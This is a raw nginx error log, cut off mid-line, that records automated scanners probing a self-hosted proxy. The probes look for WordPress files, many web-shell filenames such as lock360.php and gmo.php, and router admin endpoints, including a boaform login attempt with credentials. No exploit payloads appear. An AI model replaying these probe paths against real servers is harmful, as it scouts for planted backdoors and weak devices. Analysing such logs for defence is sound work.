263#263: *15296 open() "/var/www/html/wp-trackback.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-trackback.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:25 [error] 263#263: *15296 open() "/var/www/html/.well-known/index.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /.well-known/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:25 [error] 263#263: *15296 open() "/var/www/html/wp-admin/network/plugins.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/network/plugins.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:25 [error] 263#263: *15296 open() "/var/www/html/wp-admin/about.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:25 [error] 263#263: *15296 open() "/var/www/html/gmo.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /gmo.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:26 [error] 263#263: *15296 open() "/var/www/html/wp-includes/ID3/about.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/ID3/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:26 [error] 263#263: *15296 open() "/var/www/html/css/index.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /css/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:26 [error] 263#263: *15296 open() "/var/www/html/wp-includes/SimplePie/wp-login.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/SimplePie/wp-login.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:26 [error] 263#263: *15296 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:27 [error] 263#263: *15296 open() "/var/www/html/filemanager/dialog.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /filemanager/dialog.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:27 [error] 263#263: *15296 open() "/var/www/html/wp-admin/maint/index.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:27 [error] 263#263: *15296 open() "/var/www/html/wp-includes/customize/about.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/customize/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:27 [error] 263#263: *15296 open() "/var/www/html/index/function.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /index/function.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:28 [error] 263#263: *15296 open() "/var/www/html/uploads/autoload_classmap.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /uploads/autoload_classmap.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:28 [error] 263#263: *15296 open() "/var/www/html/wp-includes/style-engine/about.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/style-engine/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:28 [error] 263#263: *15296 open() "/var/www/html/ww1.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /ww1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:28 [error] 263#263: *15296 open() "/var/www/html/about/function.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /about/function.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:29 [error] 263#263: *15296 open() "/var/www/html/admin/function.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /admin/function.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:29 [error] 263#263: *15296 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/index.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /.well-known/acme-challenge/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:29 [error] 263#263: *15296 open() "/var/www/html/css/colors/blue/index.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /css/colors/blue/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:29 [error] 263#263: *15296 open() "/var/www/html/security.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /security.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:30 [error] 263#263: *15296 open() "/var/www/html/wp-admin/user/about.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/user/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:30 [error] 263#263: *15296 open() "/var/www/html/wp-admin/js/index.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:30 [error] 263#263: *15296 open() "/var/www/html/wp-content/upgrade/about.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-content/upgrade/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:30 [error] 263#263: *15296 open() "/var/www/html/wp-includes/assets/index.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/assets/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:30 [error] 263#263: *15296 open() "/var/www/html/wp-content/radio.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-content/radio.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:31 [error] 263#263: *15296 open() "/var/www/html/wp-includes/fonts/index.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/fonts/index.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:31 [error] 263#263: *15296 open() "/var/www/html/.well-known/admin.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /.well-known/admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:31 [error] 263#263: *15296 open() "/var/www/html/wp-content/admin.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-content/admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:31 [error] 263#263: *15296 open() "/var/www/html/wp-content/plugins/admin.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:32 [error] 263#263: *15296 open() "/var/www/html/wp-content/themes/twentytwentytwo/index.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/twentytwentytwo/index.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:32 [error] 263#263: *15296 open() "/var/www/html/.well-known/log.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /.well-known/log.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:32 [error] 263#263: *15296 open() "/var/www/html/class.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /class.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:32 [error] 263#263: *15296 open() "/var/www/html/bless5.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /bless5.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:33 [error] 263#263: *15296 open() "/var/www/html/wp-includes/js/codemirror/index.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/js/codemirror/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:33 [error] 263#263: *15296 open() "/var/www/html/wp-includes/block-patterns/index.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/block-patterns/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:33 [error] 263#263: *15296 open() "/var/www/html/lock360.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /lock360.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:33 [error] 263#263: *15296 open() "/var/www/html/f35.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /f35.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:34 [error] 263#263: *15296 open() "/var/www/html/ioxi-o1.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:34 [error] 263#263: *15296 open() "/var/www/html/juuuu.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /juuuu.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:34 [error] 263#263: *15296 open() "/var/www/html/ha.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /ha.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:34 [error] 263#263: *15296 open() "/var/www/html/gg.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /gg.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:34 [error] 263#263: *15296 open() "/var/www/html/we2.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /we2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:35 [error] 263#263: *15296 open() "/var/www/html/04.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /04.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:35 [error] 263#263: *15296 open() "/var/www/html/333.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /333.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:35 [error] 263#263: *15296 open() "/var/www/html/520.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /520.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:35 [error] 263#263: *15296 open() "/var/www/html/ar.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /ar.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:36 [error] 263#263: *15296 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /x.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:36 [error] 263#263: *15296 open() "/var/www/html/xx.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /xx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:36 [error] 263#263: *15296 open() "/var/www/html/gifclass4.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /gifclass4.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:36 [error] 263#263: *15296 open() "/var/www/html/2clas.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /2clas.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:37 [error] 263#263: *15296 open() "/var/www/html/ave.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /ave.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:37 [error] 263#263: *15296 open() "/var/www/html/wrt.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wrt.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:37 [error] 263#263: *15296 open() "/var/www/html/bibil.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /bibil.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:37 [error] 263#263: *15296 open() "/var/www/html/radio.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /radio.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:37 [error] 263#263: *15296 open() "/var/www/html/files.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /files.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:38 [error] 263#263: *15296 open() "/var/www/html/file7.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /file7.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:38 [error] 263#263: *15296 open() "/var/www/html/gifclass.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /gifclass.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:38 [error] 263#263: *15296 open() "/var/www/html/wp-admin/css/colors/midnight/about.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/midnight/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:38 [error] 263#263: *15296 open() "/var/www/html/nox.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /nox.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:39 [error] 263#263: *15296 open() "/var/www/html/file48.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /file48.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:39 [error] 263#263: *15296 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:39 [error] 263#263: *15296 open() "/var/www/html/class9.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /class9.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:39 [error] 263#263: *15296 open() "/var/www/html/la.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /la.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:40 [error] 263#263: *15296 open() "/var/www/html/bless11.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /bless11.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:40 [error] 263#263: *15296 open() "/var/www/html/ccou.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /ccou.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:40 [error] 263#263: *15296 open() "/var/www/html/ton.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /ton.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:40 [error] 263#263: *15296 open() "/var/www/html/403.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /403.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:41 [error] 263#263: *15296 open() "/var/www/html/file9.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /file9.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:41 [error] 263#263: *15296 open() "/var/www/html/ac.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /ac.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:41 [error] 263#263: *15296 open() "/var/www/html/new4.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /new4.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:41 [error] 263#263: *15296 open() "/var/www/html/pop.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /pop.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:41 [error] 263#263: *15296 open() "/var/www/html/az.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /az.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:42 [error] 263#263: *15296 open() "/var/www/html/xaz.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /xaz.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:42 [error] 263#263: *15296 open() "/var/www/html/up4.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /up4.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:42 [error] 263#263: *15296 open() "/var/www/html/1aa.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /1aa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:42 [error] 263#263: *15296 open() "/var/www/html/elp.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /elp.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:43 [error] 263#263: *15296 open() "/var/www/html/wtz.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /wtz.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:43 [error] 263#263: *15296 open() "/var/www/html/galex.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /galex.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:43 [error] 263#263: *15296 open() "/var/www/html/xb.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /xb.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:43 [error] 263#263: *15296 open() "/var/www/html/ova.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /ova.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:44 [error] 263#263: *15296 open() "/var/www/html/vx.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /vx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 12:57:44 [error] 263#263: *15296 open() "/var/www/html/rh.php" failed (2: No such file or directory), client: 40.83.96.65, server: localhost-nginx-proxy-manager, request: "GET /rh.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/20 13:23:49 [error] 264#264: *15320 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 13:24:55 [error] 264#264: *15321 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.187.35.158, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 13:27:26 [error] 264#264: *15325 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 45.91.64.8, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 13:27:26 [error] 264#264: *15327 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 45.91.64.8, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 13:37:32 [error] 264#264: *15355 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 223.123.43.69, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" +2026/01/20 13:46:08 [error] 265#265: *15365 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.65.177.158, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "91.82.83.208" +2026/01/20 13:56:29 [error] 265#265: *15378 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 14:10:42 [error] 265#265: *15392 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.187.35.158, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 14:12:54 [error] 265#265: *15395 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 14:13:41 [error] 265#265: *15396 open() "/var/www/html/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:42 [error] 265#265: *15396 open() "/var/www/html/xmlrpc.php" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /xmlrpc.php?rsd HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:44 [error] 265#265: *15396 open() "/var/www/html/blog/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:45 [error] 265#265: *15396 open() "/var/www/html/web/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:46 [error] 265#265: *15396 open() "/var/www/html/wordpress/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:47 [error] 265#265: *15396 open() "/var/www/html/website/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:47 [error] 265#265: *15396 open() "/var/www/html/wp/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:48 [error] 265#265: *15396 open() "/var/www/html/news/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:49 [error] 265#265: *15396 open() "/var/www/html/2018/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:49 [error] 265#265: *15396 open() "/var/www/html/2019/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:50 [error] 265#265: *15396 open() "/var/www/html/shop/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:51 [error] 265#265: *15396 open() "/var/www/html/wp1/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:52 [error] 265#265: *15396 open() "/var/www/html/test/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:52 [error] 265#265: *15396 open() "/var/www/html/media/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:53 [error] 265#265: *15396 open() "/var/www/html/wp2/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:54 [error] 265#265: *15396 open() "/var/www/html/site/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:55 [error] 265#265: *15396 open() "/var/www/html/cms/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:13:55 [error] 265#265: *15396 open() "/var/www/html/sito/wp-includes/wlwmanifest.xml" failed (2: No such file or directory), client: 170.64.169.181, server: localhost-nginx-proxy-manager, request: "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:17:44 [error] 265#265: *15402 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/20 14:25:20 [error] 265#265: *15407 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:20 [error] 265#265: *15407 open() "/var/www/html/class-t.api.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /class-t.api.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:20 [error] 265#265: *15407 open() "/var/www/html/zwso.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET /zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/20 14:25:20 [error] 265#265: *15407 open() "/var/www/html/wp-admin/css/colors/blue/index.php" failed (2: No such file or directory), client: 68.155.146.81, server: localhost-nginx-proxy-manager, request: "GET 